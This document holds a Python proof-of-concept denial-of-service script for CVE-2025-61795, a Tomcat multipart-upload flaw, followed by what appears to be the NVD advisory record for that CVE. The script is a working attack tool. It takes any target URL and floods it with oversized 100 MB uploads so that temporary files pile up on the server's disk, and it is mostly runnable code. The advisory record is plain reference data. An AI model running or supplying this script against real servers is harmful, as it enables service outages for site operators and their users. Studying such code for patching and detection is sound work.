CVE-2025-61795

import requests import sys import time # CVE-2025-61795 PoC - Apache Tomcat Multipart DoS # This PoC demonstrates the resource exhaustion via multipart upload errors def exploit_tomcat_dos(target_url, max_requests=100): """ Exploit CVE-2025-61795 by sending oversized multipart uploads that trigger errors and leave temporary files uncleaned. Args: target_url: Target Tomcat endpoint (e.g., http://target.com/upload) max_requests: Number of malicious requests to send """ # Create a large file content that exceeds typical upload limits # This will trigger an error in Tomcat's multipart handler large_content = b'X' * (100 * 1024 * 1024) # 100MB print(f"[*] Starting CVE-2025-61795 DoS attack against {target_url}") print(f"[*] Sending {max_requests} oversized multipart requests...") success_count = 0 for i in range(max_requests): try: files = { 'file': ('malicious_file.dat', large_content, 'application/octet-stream') } data = {'filename': f'test_{i}.dat'} response = requests.post( target_url, files=files, data=data, timeout=30, allow_redirects=False ) # Even if we get an error response, temp files may not be cleaned success_count += 1 if i % 10 == 0: print(f"[*] Progress: {i}/{max_requests} requests sent") except requests.exceptions.RequestException as e: print(f"[!] Request {i} failed: {e}") print(f"[*] Attack completed. {success_count} requests sent.") print(f"[*] Temporary files may accumulate on the server disk.") return success_count def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-61795 """ print(f"[*] Checking if {target_url} is vulnerable...") # Send a small test file first test_content = b'test data' files = {'file': ('test.txt', test_content, 'text/plain')} try: response = requests.post(target_url, files=files, timeout=10) print(f"[*] Server responded with status: {response.status_code}") print(f"[*] Target may be vulnerable if running affected Tomcat versions") return True except Exception as e: print(f"[!] Error: {e}") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve_2025_61795_poc.py <target_url> [max_requests]") print("Example: python cve_2025_61795_poc.py http://target.com/upload 100") sys.exit(1) target = sys.argv[1] max_req = int(sys.argv[2]) if len(sys.argv) > 2 else 100 check_vulnerability(target) exploit_tomcat_dos(target, max_req)

{"cve": {"id": "CVE-2025-61795", "sourceIdentifier": "[email protected]", "published": "2025-10-27T18:15:44.200", "lastModified": "2026-05-12T13:17:23.517", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Resource Shutdown or Release vulnerability in Apache Tomcat.\n\nIf an error occurred (including exceeding limits) during the processing of a multipart upload, temporary copies of the uploaded parts written to disc were not cleaned up immediately but left for the garbage collection process to delete. Depending on JVM settings, application memory usage and application load, it was possible that space for the temporary copies of uploaded parts would be filled faster than GC cleared it, leading to a DoS.\n\n\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.11, from 10.1.0-M1 through 10.1.46, from 9.0.0.M1 through 9.0.109.\n\nThe following versions were EOL at the time the CVE was created but are \nknown to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected.\nUsers are recommended to upgrade to version 11.0.12 or later, 10.1.47 or later or 9.0.110 or later which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.5.0", "versionEndIncluding": "8.5.100", "matchCriteriaId": "FF43D0D7-FBF3-4D7A-84C4-47B65A75A524"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.0.110", "matchCriteriaId": "CA30BB96-A72D-42BA-9058-7ABBEB5560E9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.27", "matchCriteriaId": "B30CA0D9-834D-4044-B03B-7E6E60A4B0E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.0", "versionEndExcluding": "10.1.47", "matchCriteriaId": "E433C62E-73C1-443F-9C89-D0C2EDF13F99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.12", "matchCriteriaId": "03C75BFF-9137-45AF-B5F4-99E2CBF1D3F4"}]}]}], "references": [{"url": "https://lists.apache.org/thread/wm9mx8brmx9g4zpywm06ryrtvd3160pp", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/27/6", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}